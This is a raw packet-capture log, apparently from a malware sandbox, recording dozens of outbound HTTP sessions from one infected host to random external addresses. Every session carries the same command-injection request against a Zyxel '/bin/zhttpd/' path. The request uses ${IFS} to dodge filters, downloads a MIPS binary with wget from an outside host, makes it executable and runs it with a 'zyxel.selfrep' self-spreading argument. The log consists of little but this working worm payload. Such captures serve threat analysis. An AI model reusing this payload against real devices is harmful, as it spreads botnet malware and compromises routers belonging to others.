                                        Jan 14, 2024 16:18:43.417876959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3848192.168.2.135618259.22.130.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417918921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3849192.168.2.1350052192.9.37.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417941093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3850192.168.2.135108041.26.189.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.417984962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3851192.168.2.1354322220.78.55.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418020010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3852192.168.2.134269895.88.47.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418041945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3853192.168.2.134899237.155.48.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418080091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3854192.168.2.1339176175.5.43.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418133020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3855192.168.2.134305067.154.87.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418174982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3856192.168.2.135418899.65.29.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418215036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3857192.168.2.1338936206.158.212.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418278933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3858192.168.2.134283092.34.43.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418315887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3859192.168.2.135038889.33.235.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418366909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3860192.168.2.136057290.98.221.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418401003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3861192.168.2.134840432.116.53.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418464899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3862192.168.2.1346366107.175.230.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418503046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3863192.168.2.1357610223.44.75.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418550014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3864192.168.2.134974837.93.85.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418576956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3865192.168.2.13459504.19.213.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418612957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3866192.168.2.1341324178.215.28.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418638945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3867192.168.2.1355770216.153.144.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418689966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3868192.168.2.133306038.67.244.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418725967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3869192.168.2.1333026207.91.174.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418785095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3870192.168.2.135983892.154.69.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418811083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3871192.168.2.1346958216.102.72.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418828964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3872192.168.2.134634277.188.140.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418867111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3873192.168.2.134320252.89.57.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418943882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3874192.168.2.135897264.152.104.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.418972969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3875192.168.2.134197889.161.159.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419023991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3876192.168.2.133301848.249.209.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419073105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3877192.168.2.1349728209.4.198.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419102907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3878192.168.2.1336982164.90.153.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419147015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3879192.168.2.1358042186.116.67.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419193983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3880192.168.2.135938051.88.146.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419224977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3881192.168.2.1349970104.178.152.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419261932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3882192.168.2.1342660185.31.82.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419281006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3883192.168.2.1338410103.94.217.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419332981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3884192.168.2.133441045.48.131.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419368982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3885192.168.2.134155847.180.239.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419416904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3886192.168.2.1344952169.31.137.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419450998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3887192.168.2.1334318174.78.254.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419483900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3888192.168.2.1350766149.48.19.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419528008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3889192.168.2.1342584195.146.133.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419574022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3890192.168.2.135086637.210.9.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419610023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3891192.168.2.1336226222.184.232.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419630051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3892192.168.2.1346094172.226.250.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419681072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3893192.168.2.1341226154.118.24.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419720888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3894192.168.2.1338202134.129.120.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419754028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3895192.168.2.135864861.214.81.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419792891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3896192.168.2.1357384219.251.114.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419847965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3897192.168.2.133380870.230.174.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419874907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3898192.168.2.1349518116.148.226.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419926882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3899192.168.2.1350976172.131.49.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.419949055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3900192.168.2.135079875.0.79.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420000076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3901192.168.2.1358658106.187.254.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420042038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3902192.168.2.135012038.166.232.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420077085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3903192.168.2.1339642166.105.46.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420124054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3904192.168.2.134802631.53.42.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420166016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3905192.168.2.134991251.203.47.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420203924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3906192.168.2.135747651.95.245.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420245886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3907192.168.2.134904699.169.92.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420273066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3908192.168.2.1340322190.205.202.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420321941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3909192.168.2.135229840.110.15.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420344114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3910192.168.2.134464892.192.34.126443
                                        TimestampBytes transferredDirectionData
